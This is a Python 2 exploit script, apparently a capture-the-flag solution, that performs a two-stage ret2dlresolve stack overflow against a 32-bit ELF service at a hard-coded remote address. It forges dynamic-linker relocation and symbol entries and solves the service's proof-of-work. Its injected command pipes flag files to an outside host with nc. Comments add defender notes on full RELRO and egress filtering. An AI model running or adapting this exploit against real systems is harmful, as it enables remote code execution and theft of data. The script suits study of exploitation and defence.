# Exploit client for a 32-bit ELF target that binds imports lazily: it plants
# a fake Elf32_Rel / Elf32_Sym pair plus a "system" string in a writable region
# and then enters the dynamic linker's resolver with them (ret2dlresolve).
# The script is Python 2 (`print` statement, `xrange`, str-as-bytes) and will
# not run unmodified on Python 3.
#
# Defender notes: the path used here only exists while lazy binding is in
# effect; linking with `-z relro -z now` (full RELRO) binds every import at
# load time, so the resolver is never entered again after startup. The 0x2c
# bytes of padding to the return address suggest no stack canary on the
# target. The observable artefact is an outbound `nc` connection from the
# service to an unrelated host; egress filtering and alerting on unexpected
# outbound connections from the service process would catch it.
import phun

# Addresses specific to the target binary; presumably DT_SYMTAB, DT_STRTAB and
# DT_JMPREL from its dynamic section (verify with `readelf -d`). They are not
# derivable from this file.
symtab = 0x80481cc
strtab = 0x804822c
jmprel = 0x80482b0
reloc_idx = 0x2a0    # symbol index the fake relocation will name
# Put the 8-byte fake Elf32_Rel directly before Elf32_Sym #reloc_idx
# (symbols are 16 bytes each), so the fake symbol sits exactly where the
# resolver will look up index reloc_idx.
baddr = reloc_idx*16+symtab - 8

# Fake relocation entry: r_offset = baddr, r_info = (reloc_idx << 8) | 7,
# where 7 is R_386_JMP_SLOT.
fake = ''
fake += phun.p32(baddr,7 | (reloc_idx<<8))
# Fake symbol's st_name: offset of the "system" string (at baddr + 12)
# relative to strtab. Only st_name is written; the remaining Elf32_Sym
# fields overlap the string bytes that follow.
fake += phun.p32(baddr + 12 - strtab)
# Symbol name, then the command that becomes system()'s argument.
fake += "system\x00cat /home/*/flag | nc lokalhost.pl 1234\x00"
## symbol
fake_sym = ''   # unused; left over from an earlier variant (see commented-out line below)
# ## string
# fake_sym += "write\x00".ljust(32,"\x00")

# NOTE(review): the name suggests a return into the vulnerable function so the
# second overflow below can happen — confirm against the binary.
reset = 0x804843B
r = phun.Remote('202.120.7.202',6666)
#r = phun.Remote('localhost',1111)

# Stage 1: 0x2c bytes of padding up to the saved return address, then a call
# into 0x8048300 with `reset` as its return address and (0, baddr, len(fake))
# as arguments, followed by the fake structures themselves. The argument
# pattern looks like read(0, baddr, len(fake)), i.e. reading `fake` into
# baddr — TODO confirm 0x8048300 against the PLT.
p = "a"*0x2c
p += phun.p32(0x8048300,reset,0,baddr,len(fake))
p += fake
# print len(p)
# r.write(p)
# print len(fake)
#r.write(fake)
# Stage 2: a second overflow once `reset` has returned into the vulnerable
# code. 0x804830B is entered with (baddr - jmprel), the byte offset of the
# fake Elf32_Rel from JMPREL (the resolver's reloc_arg); 0xdeadbeef as a
# return address that is never expected to be used; and baddr+12+7, the
# address of the command string after "system\x00" (7 bytes).
p += "a"*0x2c
p += phun.p32(0x804830B ,baddr - jmprel, 0xdeadbeef, baddr+12+7)
# print len(p)

import hashlib
def do_pow(chal):
    """Solve the service's proof-of-work.

    Brute-forces a 4-byte little-endian counter ``sol`` (one ``chr`` per byte
    of ``i``) until ``sha256(chal + sol)`` begins with three NUL bytes and
    returns that 4-byte str. ``chal`` is the challenge line read from the
    service (a Python 2 str).

    NOTE(review): the fall-through ``raise "NO POW:("`` raises a str, which is
    a TypeError on Python 2.6+ ("exceptions must be old-style classes or
    derived from BaseException"); it should be ``raise ValueError("NO POW:(")``.
    A solution is expected after about 2**24 hashes, so the 2**32-iteration
    loop is very unlikely to fall through in practice.
    """
    for i in xrange(2**32):
        # 4-byte little-endian encoding of i
        sol = chr(i&0xff) + chr((i>>8)&0xff) + chr((i>>16)&0xff) + chr((i>>24)&0xff)
        if hashlib.sha256(chal + sol).digest().startswith('\0\0\0'):
            return sol
    raise "NO POW:("

# Handshake: answer the proof-of-work first, then send both stages in one write.
chal = r.readline().strip()
r.write(do_pow(chal))
print len(p)
r.write(p)
# print len(fake)
# p = 'c'*0x2c
# p += phun.p32(0x804830B ,)
# r.write(p.ljust(0x40,"\x00"))
# r.shell()